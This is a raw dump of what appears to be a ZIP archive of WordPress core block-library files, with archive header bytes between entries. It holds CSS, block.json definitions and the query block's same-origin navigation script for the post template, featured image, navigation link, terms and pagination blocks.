.wp-block-post-featured-image__placeholder:where([style*=border-bottom-width]),.wp-block-post-featured-image img:where([style*=border-bottom-width]){ border-bottom-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-left-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-left-width]),.wp-block-post-featured-image img:where([style*=border-left-width]){ border-right-style:solid; } .wp-block-post-featured-image[style*=height] .components-placeholder{ height:100%; min-height:48px; min-width:48px; width:100%; } div[data-type="core/post-featured-image"] img{ display:block; height:auto; max-width:100%; }PK7[YQ/??&post-featured-image/editor-rtl.min.cssnu[.wp-block-post-featured-image .block-editor-media-placeholder{-webkit-backdrop-filter:none;backdrop-filter:none;z-index:1}.wp-block-post-featured-image .components-placeholder,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder{align-items:center;display:flex;justify-content:center;min-height:200px;padding:0}.wp-block-post-featured-image .components-placeholder .components-form-file-upload,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-form-file-upload{display:none}.wp-block-post-featured-image .components-placeholder .components-button,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-button{align-items:center;background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color);border-radius:50%;border-style:solid;color:#fff;display:flex;height:48px;justify-content:center;padding:0;position:relative;width:48px}.wp-block-post-featured-image .components-placeholder .components-button>svg,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-button>svg{color:inherit}.wp-block-post-featured-image .components-placeholder:where(.has-border-color),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where(.has-border-color),.wp-block-post-featured-image img:where(.has-border-color){border-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-top-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-top-color]),.wp-block-post-featured-image img:where([style*=border-top-color]){border-top-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-right-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-right-color]),.wp-block-post-featured-image img:where([style*=border-right-color]){border-left-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-bottom-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-bottom-color]),.wp-block-post-featured-image img:where([style*=border-bottom-color]){border-bottom-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-left-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-left-color]),.wp-block-post-featured-image img:where([style*=border-left-color]){border-right-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-width]),.wp-block-post-featured-image img:where([style*=border-width]){border-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-top-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-top-width]),.wp-block-post-featured-image img:where([style*=border-top-width]){border-top-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-right-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-right-width]),.wp-block-post-featured-image img:where([style*=border-right-width]){border-left-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-bottom-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-bottom-width]),.wp-block-post-featured-image img:where([style*=border-bottom-width]){border-bottom-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-left-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-left-width]),.wp-block-post-featured-image img:where([style*=border-left-width]){border-right-style:solid}.wp-block-post-featured-image[style*=height] .components-placeholder{height:100%;min-height:48px;min-width:48px;width:100%}div[data-type="core/post-featured-image"] img{display:block;height:auto;max-width:100%}PK7[!d!post-featured-image/style-rtl.cssnu[.wp-block-post-featured-image{ margin-left:0; margin-right:0; } .wp-block-post-featured-image a{ display:block; height:100%; } .wp-block-post-featured-image img{ box-sizing:border-box; height:auto; max-width:100%; vertical-align:bottom; width:100%; } .wp-block-post-featured-image.alignfull img,.wp-block-post-featured-image.alignwide img{ width:100%; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim{ background-color:#000; inset:0; position:absolute; } .wp-block-post-featured-image{ position:relative; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-gradient{ background-color:transparent; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-0{ opacity:0; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-10{ opacity:.1; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-20{ opacity:.2; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-30{ opacity:.3; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-40{ opacity:.4; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-50{ opacity:.5; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-60{ opacity:.6; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-70{ opacity:.7; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-80{ opacity:.8; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-90{ opacity:.9; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-100{ opacity:1; } .wp-block-post-featured-image:where(.alignleft,.alignright){ width:100%; }PK7[!dpost-featured-image/style.cssnu[.wp-block-post-featured-image{ margin-left:0; margin-right:0; } .wp-block-post-featured-image a{ display:block; height:100%; } .wp-block-post-featured-image img{ box-sizing:border-box; height:auto; max-width:100%; vertical-align:bottom; width:100%; } .wp-block-post-featured-image.alignfull img,.wp-block-post-featured-image.alignwide img{ width:100%; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim{ background-color:#000; inset:0; position:absolute; } .wp-block-post-featured-image{ position:relative; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-gradient{ background-color:transparent; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-0{ opacity:0; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-10{ opacity:.1; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-20{ opacity:.2; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-30{ opacity:.3; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-40{ opacity:.4; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-50{ opacity:.5; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-60{ opacity:.6; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-70{ opacity:.7; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-80{ opacity:.8; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-90{ opacity:.9; } .wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-100{ opacity:1; } .wp-block-post-featured-image:where(.alignleft,.alignright){ width:100%; }PK7[B&post-navigation-link/style-rtl.min.cssnu[.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous{display:inline-block;margin-left:1ch}.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous:not(.is-arrow-chevron){transform:scaleX(-1)}.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next{display:inline-block;margin-right:1ch}.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next:not(.is-arrow-chevron){transform:scaleX(-1)}.wp-block-post-navigation-link.has-text-align-left[style*="writing-mode: vertical-lr"],.wp-block-post-navigation-link.has-text-align-right[style*="writing-mode: vertical-rl"]{rotate:180deg}PK7[post-navigation-link/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/post-navigation-link", "title": "Post Navigation Link", "category": "theme", "description": "Displays the next or previous post link that is adjacent to the current post.", "textdomain": "default", "attributes": { "textAlign": { "type": "string" }, "type": { "type": "string", "default": "next" }, "label": { "type": "string" }, "showTitle": { "type": "boolean", "default": false }, "linkLabel": { "type": "boolean", "default": false }, "arrow": { "type": "string", "default": "none" } }, "supports": { "reusable": false, "html": false, "color": { "link": true }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalWritingMode": true, "__experimentalDefaultControls": { "fontSize": true } } }, "style": "wp-block-post-navigation-link" } PK7[(H"post-navigation-link/style.min.cssnu[.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous{display:inline-block;margin-right:1ch}.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous:not(.is-arrow-chevron){transform:scaleX(1)}.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next{display:inline-block;margin-left:1ch}.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next:not(.is-arrow-chevron){transform:scaleX(1)}.wp-block-post-navigation-link.has-text-align-left[style*="writing-mode: vertical-lr"],.wp-block-post-navigation-link.has-text-align-right[style*="writing-mode: vertical-rl"]{rotate:180deg}PK7[H"post-navigation-link/style-rtl.cssnu[.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous{ display:inline-block; margin-left:1ch; } .wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous:not(.is-arrow-chevron){ transform:scaleX(-1);; } .wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next{ display:inline-block; margin-right:1ch; } .wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next:not(.is-arrow-chevron){ transform:scaleX(-1);; } .wp-block-post-navigation-link.has-text-align-left[style*="writing-mode: vertical-lr"],.wp-block-post-navigation-link.has-text-align-right[style*="writing-mode: vertical-rl"]{ rotate:180deg; }PK7[Fٱpost-navigation-link/style.cssnu[.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous{ display:inline-block; margin-right:1ch; } .wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous:not(.is-arrow-chevron){ transform:scaleX(1); } .wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next{ display:inline-block; margin-left:1ch; } .wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next:not(.is-arrow-chevron){ transform:scaleX(1); } .wp-block-post-navigation-link.has-text-align-left[style*="writing-mode: vertical-lr"],.wp-block-post-navigation-link.has-text-align-right[style*="writing-mode: vertical-rl"]{ rotate:180deg; }PK7[:N\post-template/style-rtl.min.cssnu[.wp-block-post-template{list-style:none;margin-bottom:0;margin-top:0;max-width:100%;padding:0}.wp-block-post-template.wp-block-post-template{background:none}.wp-block-post-template.is-flex-container{display:flex;flex-direction:row;flex-wrap:wrap;gap:1.25em}.wp-block-post-template.is-flex-container>li{margin:0;width:100%}@media (min-width:600px){.wp-block-post-template.is-flex-container.is-flex-container.columns-2>li{width:calc(50% - .625em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-3>li{width:calc(33.33333% - .83333em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-4>li{width:calc(25% - .9375em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-5>li{width:calc(20% - 1em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-6>li{width:calc(16.66667% - 1.04167em)}}@media (max-width:600px){.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid{grid-template-columns:1fr}}.wp-block-post-template-is-layout-constrained>li>.alignright,.wp-block-post-template-is-layout-flow>li>.alignright{-webkit-margin-start:2em;-webkit-margin-end:0;float:left;margin-inline-end:0;margin-inline-start:2em}.wp-block-post-template-is-layout-constrained>li>.alignleft,.wp-block-post-template-is-layout-flow>li>.alignleft{-webkit-margin-start:0;-webkit-margin-end:2em;float:right;margin-inline-end:2em;margin-inline-start:0}.wp-block-post-template-is-layout-constrained>li>.aligncenter,.wp-block-post-template-is-layout-flow>li>.aligncenter{-webkit-margin-start:auto;-webkit-margin-end:auto;margin-inline-end:auto;margin-inline-start:auto}PK7[L^44post-template/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/post-template", "title": "Post Template", "category": "theme", "parent": [ "core/query" ], "description": "Contains the block elements used to render a post, like the title, date, featured image, content or excerpt, and more.", "textdomain": "default", "usesContext": [ "queryId", "query", "queryContext", "displayLayout", "templateSlug", "previewPostType", "enhancedPagination" ], "supports": { "reusable": false, "html": false, "align": [ "wide", "full" ], "layout": true, "color": { "gradients": true, "link": true, "__experimentalDefaultControls": { "background": true, "text": true } }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } }, "spacing": { "blockGap": { "__experimentalDefault": "1.25em" }, "__experimentalDefaultControls": { "blockGap": true } } }, "style": "wp-block-post-template", "editorStyle": "wp-block-post-template-editor" } PK7[wZ post-template/style.min.cssnu[.wp-block-post-template{list-style:none;margin-bottom:0;margin-top:0;max-width:100%;padding:0}.wp-block-post-template.wp-block-post-template{background:none}.wp-block-post-template.is-flex-container{display:flex;flex-direction:row;flex-wrap:wrap;gap:1.25em}.wp-block-post-template.is-flex-container>li{margin:0;width:100%}@media (min-width:600px){.wp-block-post-template.is-flex-container.is-flex-container.columns-2>li{width:calc(50% - .625em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-3>li{width:calc(33.33333% - .83333em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-4>li{width:calc(25% - .9375em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-5>li{width:calc(20% - 1em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-6>li{width:calc(16.66667% - 1.04167em)}}@media (max-width:600px){.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid{grid-template-columns:1fr}}.wp-block-post-template-is-layout-constrained>li>.alignright,.wp-block-post-template-is-layout-flow>li>.alignright{-webkit-margin-start:2em;-webkit-margin-end:0;float:right;margin-inline-end:0;margin-inline-start:2em}.wp-block-post-template-is-layout-constrained>li>.alignleft,.wp-block-post-template-is-layout-flow>li>.alignleft{-webkit-margin-start:0;-webkit-margin-end:2em;float:left;margin-inline-end:2em;margin-inline-start:0}.wp-block-post-template-is-layout-constrained>li>.aligncenter,.wp-block-post-template-is-layout-flow>li>.aligncenter{-webkit-margin-start:auto;-webkit-margin-end:auto;margin-inline-end:auto;margin-inline-start:auto}PK7[| opost-template/style-rtl.cssnu[.wp-block-post-template{ list-style:none; margin-bottom:0; margin-top:0; max-width:100%; padding:0; } .wp-block-post-template.wp-block-post-template{ background:none; } .wp-block-post-template.is-flex-container{ display:flex; flex-direction:row; flex-wrap:wrap; gap:1.25em; } .wp-block-post-template.is-flex-container>li{ margin:0; width:100%; } @media (min-width:600px){ .wp-block-post-template.is-flex-container.is-flex-container.columns-2>li{ width:calc(50% - .625em); } .wp-block-post-template.is-flex-container.is-flex-container.columns-3>li{ width:calc(33.33333% - .83333em); } .wp-block-post-template.is-flex-container.is-flex-container.columns-4>li{ width:calc(25% - .9375em); } .wp-block-post-template.is-flex-container.is-flex-container.columns-5>li{ width:calc(20% - 1em); } .wp-block-post-template.is-flex-container.is-flex-container.columns-6>li{ width:calc(16.66667% - 1.04167em); } } @media (max-width:600px){ .wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid{ grid-template-columns:1fr; } } .wp-block-post-template-is-layout-constrained>li>.alignright,.wp-block-post-template-is-layout-flow>li>.alignright{ -webkit-margin-start:2em; -webkit-margin-end:0; float:left; margin-inline-end:0; margin-inline-start:2em; } .wp-block-post-template-is-layout-constrained>li>.alignleft,.wp-block-post-template-is-layout-flow>li>.alignleft{ -webkit-margin-start:0; -webkit-margin-end:2em; float:right; margin-inline-end:2em; margin-inline-start:0; } .wp-block-post-template-is-layout-constrained>li>.aligncenter,.wp-block-post-template-is-layout-flow>li>.aligncenter{ -webkit-margin-start:auto; -webkit-margin-end:auto; margin-inline-end:auto; margin-inline-start:auto; }PK7[&Ipost-template/style.cssnu[.wp-block-post-template{ list-style:none; margin-bottom:0; margin-top:0; max-width:100%; padding:0; } .wp-block-post-template.wp-block-post-template{ background:none; } .wp-block-post-template.is-flex-container{ display:flex; flex-direction:row; flex-wrap:wrap; gap:1.25em; } .wp-block-post-template.is-flex-container>li{ margin:0; width:100%; } @media (min-width:600px){ .wp-block-post-template.is-flex-container.is-flex-container.columns-2>li{ width:calc(50% - .625em); } .wp-block-post-template.is-flex-container.is-flex-container.columns-3>li{ width:calc(33.33333% - .83333em); } .wp-block-post-template.is-flex-container.is-flex-container.columns-4>li{ width:calc(25% - .9375em); } .wp-block-post-template.is-flex-container.is-flex-container.columns-5>li{ width:calc(20% - 1em); } .wp-block-post-template.is-flex-container.is-flex-container.columns-6>li{ width:calc(16.66667% - 1.04167em); } } @media (max-width:600px){ .wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid{ grid-template-columns:1fr; } } .wp-block-post-template-is-layout-constrained>li>.alignright,.wp-block-post-template-is-layout-flow>li>.alignright{ -webkit-margin-start:2em; -webkit-margin-end:0; float:right; margin-inline-end:0; margin-inline-start:2em; } .wp-block-post-template-is-layout-constrained>li>.alignleft,.wp-block-post-template-is-layout-flow>li>.alignleft{ -webkit-margin-start:0; -webkit-margin-end:2em; float:left; margin-inline-end:2em; margin-inline-start:0; } .wp-block-post-template-is-layout-constrained>li>.aligncenter,.wp-block-post-template-is-layout-flow>li>.aligncenter{ -webkit-margin-start:auto; -webkit-margin-end:auto; margin-inline-end:auto; margin-inline-start:auto; }PK7[]E[uupost-terms/style-rtl.min.cssnu[.wp-block-post-terms{box-sizing:border-box}.wp-block-post-terms .wp-block-post-terms__separator{white-space:pre-wrap}PK7[uʨGpost-terms/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/post-terms", "title": "Post Terms", "category": "theme", "description": "Post terms.", "textdomain": "default", "attributes": { "term": { "type": "string" }, "textAlign": { "type": "string" }, "separator": { "type": "string", "default": ", " }, "prefix": { "type": "string", "default": "" }, "suffix": { "type": "string", "default": "" } }, "usesContext": [ "postId", "postType" ], "supports": { "html": false, "color": { "gradients": true, "link": true, "__experimentalDefaultControls": { "background": true, "text": true, "link": true } }, "spacing": { "margin": true, "padding": true }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } } }, "style": "wp-block-post-terms" } PK7[]E[uupost-terms/style.min.cssnu[.wp-block-post-terms{box-sizing:border-box}.wp-block-post-terms .wp-block-post-terms__separator{white-space:pre-wrap}PK7[.post-terms/style-rtl.cssnu[.wp-block-post-terms{ box-sizing:border-box; } .wp-block-post-terms .wp-block-post-terms__separator{ white-space:pre-wrap; }PK7[.post-terms/style.cssnu[.wp-block-post-terms{ box-sizing:border-box; } .wp-block-post-terms .wp-block-post-terms__separator{ white-space:pre-wrap; }PK7[2 array(), 'version' => 'ecab5647d5d9321e0101'); PK7[8}? query/view.jsnu["use strict"; (self["__WordPressPrivateInteractivityAPI__"] = self["__WordPressPrivateInteractivityAPI__"] || []).push([[155],{ /***/ 890: /***/ (function(__unused_webpack_module, __unused_webpack___webpack_exports__, __webpack_require__) { /* harmony import */ var _wordpress_interactivity__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(754); /** * WordPress dependencies */ const isValidLink = ref => ref && ref instanceof window.HTMLAnchorElement && ref.href && (!ref.target || ref.target === '_self') && ref.origin === window.location.origin; const isValidEvent = event => event.button === 0 && // left clicks only !event.metaKey && // open in new tab (mac) !event.ctrlKey && // open in new tab (windows) !event.altKey && // download !event.shiftKey && !event.defaultPrevented; (0,_wordpress_interactivity__WEBPACK_IMPORTED_MODULE_0__/* .store */ .h)({ selectors: { core: { query: { startAnimation: ({ context }) => context.core.query.animation === 'start', finishAnimation: ({ context }) => context.core.query.animation === 'finish' } } }, actions: { core: { query: { navigate: async ({ event, ref, context }) => { const isDisabled = ref.closest('[data-wp-navigation-id]')?.dataset.wpNavigationDisabled; if (isValidLink(ref) && isValidEvent(event) && !isDisabled) { event.preventDefault(); const id = ref.closest('[data-wp-navigation-id]').dataset.wpNavigationId; // Don't announce the navigation immediately, wait 300 ms. const timeout = setTimeout(() => { context.core.query.message = context.core.query.loadingText; context.core.query.animation = 'start'; }, 400); await (0,_wordpress_interactivity__WEBPACK_IMPORTED_MODULE_0__/* .navigate */ .c4)(ref.href); // Dismiss loading message if it hasn't been added yet. clearTimeout(timeout); // Announce that the page has been loaded. If the message is the // same, we use a no-break space similar to the @wordpress/a11y // package: https://github.com/WordPress/gutenberg/blob/c395242b8e6ee20f8b06c199e4fc2920d7018af1/packages/a11y/src/filter-message.js#L20-L26 context.core.query.message = context.core.query.loadedText + (context.core.query.message === context.core.query.loadedText ? '\u00A0' : ''); context.core.query.animation = 'finish'; context.core.query.url = ref.href; // Focus the first anchor of the Query block. const firstAnchor = `[data-wp-navigation-id=${id}] .wp-block-post-template a[href]`; document.querySelector(firstAnchor)?.focus(); } }, prefetch: async ({ ref }) => { const isDisabled = ref.closest('[data-wp-navigation-id]')?.dataset.wpNavigationDisabled; if (isValidLink(ref) && !isDisabled) { await (0,_wordpress_interactivity__WEBPACK_IMPORTED_MODULE_0__/* .prefetch */ .tL)(ref.href); } } } } }, effects: { core: { query: { prefetch: async ({ ref, context }) => { if (context.core.query.url && isValidLink(ref)) { await (0,_wordpress_interactivity__WEBPACK_IMPORTED_MODULE_0__/* .prefetch */ .tL)(ref.href); } } } } } }); /***/ }) }, /******/ function(__webpack_require__) { // webpackRuntimeModules /******/ var __webpack_exec__ = function(moduleId) { return __webpack_require__(__webpack_require__.s = moduleId); } /******/ var __webpack_exports__ = (__webpack_exec__(890)); /******/ } ]);PK7[[nnquery/editor-rtl.cssnu[.block-library-query-toolbar__popover .components-popover__content{ min-width:230px; } .wp-block-query__create-new-link{ padding:0 52px 16px 16px; } .block-library-query__pattern-selection-content .block-editor-block-patterns-list{ grid-gap:8px; display:grid; grid-template-columns:1fr 1fr 1fr; } .block-library-query__pattern-selection-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{ margin-bottom:0; } .block-library-query__pattern-selection-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item .block-editor-block-preview__container{ max-height:250px; } .block-library-query-pattern__selection-modal .block-editor-block-patterns-list{ column-count:2; column-gap:24px; } @media (min-width:1280px){ .block-library-query-pattern__selection-modal .block-editor-block-patterns-list{ column-count:3; } } .block-library-query-pattern__selection-modal .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{ break-inside:avoid-column; } .block-library-query-pattern__selection-modal .block-library-query-pattern__selection-search{ background:#fff; margin-bottom:2px; padding:16px 0; position:sticky; top:0; z-index:2; } .block-library-query-toolspanel__filters .components-form-token-field__help{ margin-bottom:0; } .block-library-query-toolspanel__filters .block-library-query-inspector__taxonomy-control:not(:last-child){ margin-bottom:24px; } @media (min-width:600px){ .wp-block-query__enhanced-pagination-modal{ max-width:480px; } } .wp-block-query__enhanced-pagination-notice{ margin:0; }PK7[>TTquery/view.asset.phpnu[ array(), 'version' => 'f932eea8999458215fe1'); PK7[5ёquery/editor-rtl.min.cssnu[.block-library-query-toolbar__popover .components-popover__content{min-width:230px}.wp-block-query__create-new-link{padding:0 52px 16px 16px}.block-library-query__pattern-selection-content .block-editor-block-patterns-list{grid-gap:8px;display:grid;grid-template-columns:1fr 1fr 1fr}.block-library-query__pattern-selection-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{margin-bottom:0}.block-library-query__pattern-selection-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item .block-editor-block-preview__container{max-height:250px}.block-library-query-pattern__selection-modal .block-editor-block-patterns-list{column-count:2;column-gap:24px}@media (min-width:1280px){.block-library-query-pattern__selection-modal .block-editor-block-patterns-list{column-count:3}}.block-library-query-pattern__selection-modal .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{break-inside:avoid-column}.block-library-query-pattern__selection-modal .block-library-query-pattern__selection-search{background:#fff;margin-bottom:2px;padding:16px 0;position:sticky;top:0;z-index:2}.block-library-query-toolspanel__filters .components-form-token-field__help{margin-bottom:0}.block-library-query-toolspanel__filters .block-library-query-inspector__taxonomy-control:not(:last-child){margin-bottom:24px}@media (min-width:600px){.wp-block-query__enhanced-pagination-modal{max-width:480px}}.wp-block-query__enhanced-pagination-notice{margin:0}PK7[-Φquery/view.min.jsnu["use strict";(self.__WordPressPrivateInteractivityAPI__=self.__WordPressPrivateInteractivityAPI__||[]).push([[155],{890:function(e,t,a){var r=a(754);const i=e=>e&&e instanceof window.HTMLAnchorElement&&e.href&&(!e.target||"_self"===e.target)&&e.origin===window.location.origin;(0,r.h)({selectors:{core:{query:{startAnimation:({context:e})=>"start"===e.core.query.animation,finishAnimation:({context:e})=>"finish"===e.core.query.animation}}},actions:{core:{query:{navigate:async({event:e,ref:t,context:a})=>{const o=t.closest("[data-wp-navigation-id]")?.dataset.wpNavigationDisabled;if(i(t)&&(e=>!(0!==e.button||e.metaKey||e.ctrlKey||e.altKey||e.shiftKey||e.defaultPrevented))(e)&&!o){e.preventDefault();const i=t.closest("[data-wp-navigation-id]").dataset.wpNavigationId,o=setTimeout((()=>{a.core.query.message=a.core.query.loadingText,a.core.query.animation="start"}),400);await(0,r.c4)(t.href),clearTimeout(o),a.core.query.message=a.core.query.loadedText+(a.core.query.message===a.core.query.loadedText?" ":""),a.core.query.animation="finish",a.core.query.url=t.href;const n=`[data-wp-navigation-id=${i}] .wp-block-post-template a[href]`;document.querySelector(n)?.focus()}},prefetch:async({ref:e})=>{const t=e.closest("[data-wp-navigation-id]")?.dataset.wpNavigationDisabled;i(e)&&!t&&await(0,r.tL)(e.href)}}}},effects:{core:{query:{prefetch:async({ref:e,context:t})=>{t.core.query.url&&i(e)&&await(0,r.tL)(e.href)}}}}})}},function(e){var t;t=890,e(e.s=t)}]);PK7[I>MMquery-no-results/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/query-no-results", "title": "No results", "category": "theme", "description": "Contains the block elements used to render content when no query results are found.", "parent": [ "core/query" ], "textdomain": "default", "usesContext": [ "queryId", "query" ], "supports": { "align": true, "reusable": false, "html": false, "color": { "gradients": true, "link": true }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } } } } PK7[cCͣquery-pagination/editor.min.cssnu[.wp-block[data-align=center]>.wp-block-query-pagination{justify-content:center}.editor-styles-wrapper .wp-block-query-pagination{max-width:100%}.editor-styles-wrapper .wp-block-query-pagination.block-editor-block-list__layout{margin:0}.wp-block-query-pagination>.wp-block-query-pagination-next,.wp-block-query-pagination>.wp-block-query-pagination-numbers,.wp-block-query-pagination>.wp-block-query-pagination-previous{margin:.5em .5em .5em 0}.wp-block-query-pagination>.wp-block-query-pagination-next:last-child,.wp-block-query-pagination>.wp-block-query-pagination-numbers:last-child,.wp-block-query-pagination>.wp-block-query-pagination-previous:last-child{margin-right:0}PK7[>"query-pagination/style-rtl.min.cssnu[.wp-block-query-pagination>.wp-block-query-pagination-next,.wp-block-query-pagination>.wp-block-query-pagination-numbers,.wp-block-query-pagination>.wp-block-query-pagination-previous{margin-bottom:.5em;margin-right:.5em}.wp-block-query-pagination>.wp-block-query-pagination-next:last-child,.wp-block-query-pagination>.wp-block-query-pagination-numbers:last-child,.wp-block-query-pagination>.wp-block-query-pagination-previous:last-child{margin-right:0}.wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-next:last-of-type{-webkit-margin-start:auto;margin-inline-start:auto}.wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-previous:first-child{-webkit-margin-end:auto;margin-inline-end:auto}.wp-block-query-pagination .wp-block-query-pagination-previous-arrow{display:inline-block;margin-left:1ch}.wp-block-query-pagination .wp-block-query-pagination-previous-arrow:not(.is-arrow-chevron){transform:scaleX(-1)}.wp-block-query-pagination .wp-block-query-pagination-next-arrow{display:inline-block;margin-right:1ch}.wp-block-query-pagination .wp-block-query-pagination-next-arrow:not(.is-arrow-chevron){transform:scaleX(-1)}.wp-block-query-pagination.aligncenter{justify-content:center}PK7[gu uuquery-pagination/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/query-pagination", "title": "Pagination", "category": "theme", "parent": [ "core/query" ], "description": "Displays a paginated navigation to next/previous set of posts, when applicable.", "textdomain": "default", "attributes": { "paginationArrow": { "type": "string", "default": "none" }, "showLabel": { "type": "boolean", "default": true } }, "usesContext": [ "queryId", "query" ], "providesContext": { "paginationArrow": "paginationArrow", "showLabel": "showLabel" }, "supports": { "align": true, "reusable": false, "html": false, "color": { "gradients": true, "link": true, "__experimentalDefaultControls": { "background": true, "text": true, "link": true } }, "layout": { "allowSwitching": false, "allowInheriting": false, 